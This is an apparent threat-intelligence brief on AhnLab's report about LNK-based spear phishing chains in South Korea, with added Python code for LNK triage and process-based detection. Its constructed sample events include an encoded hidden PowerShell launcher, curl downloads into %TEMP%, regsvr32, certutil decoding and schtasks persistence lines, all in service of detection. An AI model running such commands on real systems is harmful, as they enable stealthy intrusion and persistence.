Answer Brief
AhnLab’s May 2026 report identifies spear phishing with malicious LNK files as the dominant APT infection vector in South Korea. It details six LNK-based attack chains (Types A to F) that abuse PowerShell, curl.exe and other legitimate Windows tools to deploy info-stealers, keyloggers and backdoors staged on GitHub and Google Drive, plus two further chains (Types G and H) that use JSE and CHM files together with regsvr32.exe and certutil.exe for evasion.
Signal Timeline
A quick visual path for analysts before reading the full brief.
- 1. AhnLab monitored domestic APT attacks in South Korea
- 2. Report published by ASEC/AhnLab
Why It Matters
AhnLab’s May 2026 report on domestic APT attack trends in South Korea gives a technical breakdown of threat actor behavior observed through its telemetry, and finds that the majority of detected APT activity originated from spear phishing campaigns that used LNK files as the initial infection vector. The report splits these into six subtypes (Type A through F), each a multi-stage chain in which the LNK file acts as a launcher for scripts that download and execute further payloads. A consistent pattern across the chains is the abuse of legitimate Windows utilities, particularly PowerShell, curl.exe and other built-in command-line tools, to retrieve additional malware from external sources, including GitHub repositories and Google Drive links. Hosting payloads on trusted cloud platforms lets attackers blend their traffic with legitimate user activity and reduces the chance of detection by network or endpoint controls that allow-list those domains.
The layered execution techniques show the sophistication of these campaigns. Type A attacks use malicious PowerShell commands embedded in LNK files to contact external URLs, download additional files and execute AutoIt-based malware, establishing persistence through a Windows scheduled task. These chains perform reconnaissance (directory queries, file enumeration) and support data exfiltration and file upload/download. Type B follows a similar pattern but relies on curl.exe to download malicious HTA files into the %TEMP% directory; the HTA is then executed to load info-stealers, keyloggers and backdoors directly into memory. The use of GitHub and Google Drive as distribution points in both types reflects a deliberate strategy to exploit the trust enterprises extend to those services.
Technical Signal
Type C attacks refine this approach by embedding Base64-encoded PowerShell in LNK files that decodes and executes in the %TEMP% folder, then downloads decoy files and malicious scripts from GitHub to deploy XenoRAT, a remote access tool that collects system information and gives the attacker control of the host, with persistence again provided by a scheduled task. Types D and E add complexity. Type D uses LNK-dropped XML, JS and PowerShell scripts to generate data files and register tasks, and after passing through BAT and compressed-file layers ends in malicious Python scripts that give the backdoor remote command execution and file control. Type E strengthens the social engineering by disguising the LNK as a resume or document, embedding a decoy file alongside the malicious PowerShell command, and then using VBS, BAT and PowerShell scripts to register tasks and perform DLL side-loading so that a backdoor runs inside a legitimate process.
Type F is the most elaborate chain: CMD and PowerShell commands embedded in the LNK download additional files, copy curl.exe to %TEMP%, run a decoy PDF and a BAT downloader, install Python packages, and register pythonw.exe under a legitimate-looking scheduled task name before a final Python backdoor starts communicating with attacker-controlled C2 servers to execute commands and return results. The number of stages reflects deliberate operational planning and evasion intent: the chain is built almost entirely from scripts, an interpreter and living-off-the-land binaries (LOLBins), so there is little in the way of a conventional malware binary for signature-based controls to match.
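Every Type A to F chain starts with the shortcut itself, so the first triage question is what the .lnk actually runs. The following parser is an added example, not code from the report or from AhnLab; it reads the Shell Link header and StringData fields per the MS-SHLLINK layout and flags the traits the chains above rely on (a script-host target, an encoded or remote-fetching command line, whitespace padding that hides the command in the Properties dialog, a minimised window, a document-style icon). The build_lnk() helper, the sample shortcut bytes and the Base64 string "QQBCAEMA" (which decodes to "ABC") are constructed here for the example.

```python
"""
Triage parser for Windows shortcut (.lnk) files, following MS-SHLLINK.
Added example: the sample LNK bytes are constructed by build_lnk() below and
are not bytes from any real sample.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # window opens minimised and inactive
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]


def _read_string(buf, off, unicode):
    """StringData item: uint16 character count, then the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        end = off + count * 2
        return buf[off:end].decode("utf-16-le"), end
    end = off + count
    return buf[off:end].decode("cp1252", errors="replace"), end


def parse_lnk(data):
    """Return header flags, ShowCommand and the StringData fields of a .lnk."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDList: uint16 size + items
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # skip LinkInfo: uint32 total size
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    info = {"flags": flags, "show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        info[key], off = _read_string(data, off, flags & IS_UNICODE) if flags & bit else (None, off)
    return info


LAUNCHER = re.compile(r"(powershell|pwsh|cmd\.exe|mshta|wscript|cscript|curl|certutil|regsvr32|rundll32)", re.I)
ENCODED = re.compile(r"-(e|ec|en|enc|encodedcommand)\b", re.I)


def triage_lnk(data):
    """Flag shortcut traits seen in the LNK-launched chains; [] means nothing found."""
    info = parse_lnk(data)
    args = info["arguments"] or ""
    findings = []
    if LAUNCHER.search(f'{info["relative_path"] or ""} {args}'):
        findings.append("launcher")  # shortcut runs a script host or LOLBin
    if ENCODED.search(args):
        findings.append("encoded")  # -EncodedCommand style argument
    if re.search(r"https?://", args, re.I):
        findings.append("remote")  # pulls a second stage from a URL
    if len(args) > 260:
        findings.append("long_args")  # beyond what the Properties dialog shows
    if args != args.lstrip():
        findings.append("padded")  # leading whitespace pushes the payload out of view
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("hidden_window")
    if "launcher" in findings and info["icon_location"]:
        findings.append("icon_masquerade")  # custom icon on a script launcher; weak on its own
    return findings


def _sd(s):
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments="", show_command=1, icon_location="", id_list=b""):
    """Construct a minimal Unicode .lnk (header, optional IDList, StringData) for tests."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    flags |= HAS_LINK_TARGET_ID_LIST if id_list else 0
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
              + bytes(4 + 24)                            # FileAttributes, 3 FILETIMEs
              + struct.pack("<IiI", 0, 0, show_command)  # FileSize, IconIndex, ShowCommand
              + bytes(12))                               # HotKey, Reserved1-3
    body = struct.pack("<H", len(id_list)) + id_list if id_list else b""
    body += _sd(relative_path)
    body += _sd(arguments) if arguments else b""
    body += _sd(icon_location) if icon_location else b""
    return header + body


# Constructed sample resembling the Type C/E lures: a "resume" shortcut whose real
# target is PowerShell with a padded, encoded command (Base64 of "ABC" here).
RESUME_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    " " * 300 + "-w hidden -ep bypass -enc QQBCAEMA",
    show_command=SW_SHOWMINNOACTIVE,
    icon_location=r"%SystemRoot%\System32\shell32.dll",
    id_list=b"\x04\x00\x1f\x50\x00\x00",
)
NOTEPAD_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\alice\notes.txt")

if __name__ == "__main__":
    for name, blob in (("resume.pdf.lnk", RESUME_LNK), ("notes.lnk", NOTEPAD_LNK)):
        print(name, triage_lnk(blob) or "clean")
```

Run it against a real attachment with parse_lnk(open(path, "rb").read()); the full argument string is what to look at, because the Properties dialog truncates it and the leading padding hides the interesting part. Real samples often also carry ExtraData blocks after the StringData (tracker and environment blocks that reveal the attacker's machine name and paths); the parser above stops before them, which is enough for triage.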
Operational Impact
Beyond LNK-based vectors, the report identifies two additional attack types that use other file formats to the same end. Type G uses JSE (JScript.Encode) files to drop malicious DLLs into the %ProgramData% directory, which are then loaded via regsvr32.exe, a signed Windows utility commonly abused to execute attacker-controlled DLLs (ATT&CK T1218.010). Once loaded, the DLL functions as a backdoor that steals user information and carries out further malicious actions. Type H uses CHM (Compiled HTML Help) files (T1218.001): an embedded HTML script triggers a PowerShell command that writes a Base64-encoded VBScript, certutil.exe decodes it (T1140), and wscript.exe executes it. This chain then connects to external C2 servers to receive and run additional scripts, a full infection lifecycle built only from native Windows components and obfuscation.
AhnLab’s products detect the samples under a wide array of names, including Backdoor/Win.Agent.C5882829, Backdoor/Win.Mudsdoor.R773004, Downloader/LNK.Generic.SC314654, Downloader/PS.Agent, Downloader/PowerShell.Agent, Downloader/VBS.Agent.SC314574, Infostealer/Win.Agent.C5882827, Trojan/BAT.Agent.SC315175, Trojan/JS.Agent.SC314582, Trojan/JSE.Agent, Trojan/LNK.Agent, Trojan/LNK.Loader.SC315176, Trojan/Python.Agent, Trojan/VBS.Loader, Trojan/XML.Task, Trojan/XML.Schedule, and Unwanted/Win.MeshCmd.R700828. The report notes that variants may evade detection because of obfuscation or packing, which is why behavioral analytics and memory-based detection are needed alongside signature-based controls. The objectives of these campaigns, consistent across types, are theft of user data, system compromise and the staging of additional malware, putting both endpoint integrity and network security at risk.
What To Watch
For security operations teams in East Asia and beyond, this report offers actionable intelligence on current TTPs in a high-risk environment. The reliance on LNK files, a frequently overlooked vector, combined with scripting and legitimate-tool abuse shows how adversaries minimize their dependence on traditional malware binaries to evade detection. Teams should monitor for anomalous LNK execution, unexpected PowerShell or cmd.exe processes spawned from user-facing applications (e.g., Outlook, Word, or explorer.exe after a double-click) and unauthorized script downloads from public cloud storage. Enabling detailed logging for scheduled task creation or modification (Security event 4698, or process creation events for schtasks.exe), monitoring regsvr32.exe and certutil.exe for unusual DLLs, decode operations or scripts, and reviewing proxy logs for connections to the GitHub or Google Drive URLs named in the report can significantly improve early detection. Two practical checks: .lnk attachments, including those inside archives, have no legitimate business use in inbound mail and can be blocked outright at the gateway; and Explorer never displays the .lnk extension, even when extension hiding is disabled, so a resume.pdf.lnk lure shows up as resume.pdf. Email security controls should be tuned to detect spear phishing with document lures, and endpoint detection and response (EDR) solutions should be configured to flag script-based execution chains that begin with user interaction.
While the report is geographically focused on South Korea, the TTPs described are not regionally unique and have been observed in global threat landscapes. Organizations with operations, subsidiaries, or supply chain links in East Asia should treat this as first-hand situational awareness to validate internal telemetry against the described behaviors. Comparing endpoint alerts, mail gateway detections, identity anomalies, and network logs for similarities in execution patterns—such as LNK-triggered PowerShell chains, curl.exe downloads to %TEMP%, or regsvr32 loading unsigned DLLs—can help prioritize triage without asserting attribution. Sustained observation of these patterns across multiple regional sources would indicate a developing trend worthy of strategic monitoring.
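The execution patterns listed in this section (LNK-triggered PowerShell chains, curl.exe downloads to %TEMP%, regsvr32 loading DLLs from %ProgramData%, certutil decoding, scheduled tasks pointing at script hosts) can be written down as rules over process-creation telemetry. The block below is an added example, not code from the report or from AhnLab: it evaluates those rules over events with Sysmon Event ID 1 field names (ParentImage, Image, CommandLine). The events are constructed for the example; the user name, paths, task name and example.invalid URLs are placeholders, not indicators from the report.

```python
"""
Detection rules for the LNK -> script -> LOLBin chains described in the brief,
expressed over process-creation events (Sysmon Event ID 1 style fields).
Added example; SAMPLE_EVENTS are constructed, not real telemetry.
"""
import re

OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "hwp.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# user-writable locations the chains stage into (%TEMP%, %ProgramData%, Public, Downloads)
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|programdata|users\\public|downloads)\\", re.I)
ENCODED = re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s", re.I)
REMOTE = re.compile(r"https?://", re.I)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the rule names an event matches ([] = nothing suspicious)."""
    parent, image = _base(ev.get("ParentImage", "")), _base(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")  # lure document runs a script
    if parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe", "cmd.exe"} \
            and (ENCODED.search(cmd) or REMOTE.search(cmd) or len(cmd) > 500):
        hits.append("lnk_style_launcher")  # double-clicked LNK, Types A to F
    if image == "curl.exe":
        if USER_WRITABLE.search(ev.get("Image", "")):
            hits.append("curl_copied_to_user_dir")  # Type F copies curl.exe to %TEMP%
        if re.search(r"\s(-o|--output)\s", cmd, re.I) and USER_WRITABLE.search(cmd):
            hits.append("curl_download_to_user_dir")  # Type B HTA into %TEMP%
    if image == "regsvr32.exe" and (USER_WRITABLE.search(cmd) or re.search(r"/i:https?://", cmd, re.I)):
        hits.append("regsvr32_untrusted_dll")  # Type G DLL from %ProgramData%
    if image == "certutil.exe" and re.search(r"-(decode|decodehex|urlcache)\b", cmd, re.I):
        hits.append("certutil_decode_or_download")  # Type H Base64 VBScript
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) \
            and (USER_WRITABLE.search(cmd) or re.search(r"pythonw?\.exe|wscript|powershell", cmd, re.I)):
        hits.append("task_runs_script_payload")  # persistence in Types A, C to F
    if image in {"wscript.exe", "cscript.exe", "mshta.exe"} and USER_WRITABLE.search(cmd):
        hits.append("script_host_from_user_dir")
    if image in {"python.exe", "pythonw.exe"} and USER_WRITABLE.search(ev.get("Image", "")):
        hits.append("python_from_user_dir")  # Type F pythonw.exe backdoor
    return hits


T = r"C:\Users\alice\AppData\Local\Temp"  # placeholder profile path
SAMPLE_EVENTS = [  # constructed for the example
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc QQBCAEMA"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": rf"curl.exe -s -o {T}\update.hta https://example.invalid/u.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\ProgramData\svc.dll"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": rf"certutil -decode {T}\a.txt {T}\a.vbs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn "WindowsUpdate" /tr "C:\ProgramData\py\pythonw.exe C:\ProgramData\py\main.py"'},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign admin shortcut: no hits
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -File "C:\Program Files\IT\inventory.ps1"'},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": rf"{T}\curl.exe",
     "CommandLine": rf"curl.exe -s -o {T}\dec.pdf https://example.invalid/dec.pdf"},
]


def scan(events=SAMPLE_EVENTS):
    """Map event index -> matched rules, skipping events with no hits."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


if __name__ == "__main__":
    for idx, rules in scan().items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], rules)
```

The rules deliberately key on the parent/child pair and on user-writable paths rather than on file hashes or URLs, because those are the parts of the chains that stay stable when the payload is repacked. Expect the explorer.exe rule to fire on legitimate administrative shortcuts with long command lines; tune the length threshold and exclude known scripts rather than dropping the rule.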
Event Type: security
Importance: high
Affected Companies
- AhnLab
Affected Sectors
- cybersecurity
- technology
Key Numbers
- Primary attack vector: Spear Phishing
- Most used file type: LNK files
- Malware observed: backdoors (including XenoRAT), info-stealers, keyloggers; AutoIt- and Python-based payloads
- Payload delivery channels: GitHub, Google Drive
Timeline
- AhnLab monitored domestic APT attacks in South Korea
- Report published by ASEC/AhnLab
Frequently Asked Questions
What was the primary infection vector in South Korean APT attacks in May 2026 according to AhnLab?
The primary infection vector was spear phishing emails, often disguised as work-related documents, which delivered malicious LNK files to initiate multi-stage infection chains.
Which file types were most commonly used in the APT attack chains observed by AhnLab in May 2026?
LNK files were the most prevalent; separate chains used JSE and CHM files. All of them relied on scripts (PowerShell, VBS, BAT, JS, JSE) to download and execute payloads, establish persistence via Task Scheduler, and deploy backdoors or info-stealers.
How did attackers use legitimate tools and cloud services in the APT campaigns detailed in the AhnLab report?
Attackers abused legitimate Windows tools like curl.exe, certutil.exe, regsvr32.exe, and pythonw.exe, and hosted malicious payloads on trusted cloud services such as GitHub and Google Drive to evade detection and facilitate payload delivery.
What types of malware were delivered in the APT attack chains described in the AhnLab May 2026 report?
The attack chains delivered backdoors (e.g., XenoRAT and the family detected as Backdoor/Win.Mudsdoor), info-stealers, keyloggers, and downloaders, often using DLL side-loading, script-based execution, and process injection to maintain persistence and exfiltrate system information.
What mitigation steps does AhnLab recommend based on its May 2026 APT threat analysis?
AhnLab recommends verifying email senders, avoiding opening files from untrusted sources, reviewing insecure configurations, applying latest OS and browser patches, and maintaining updated V3 antivirus definitions to defend against evolving LNK-based APT tactics.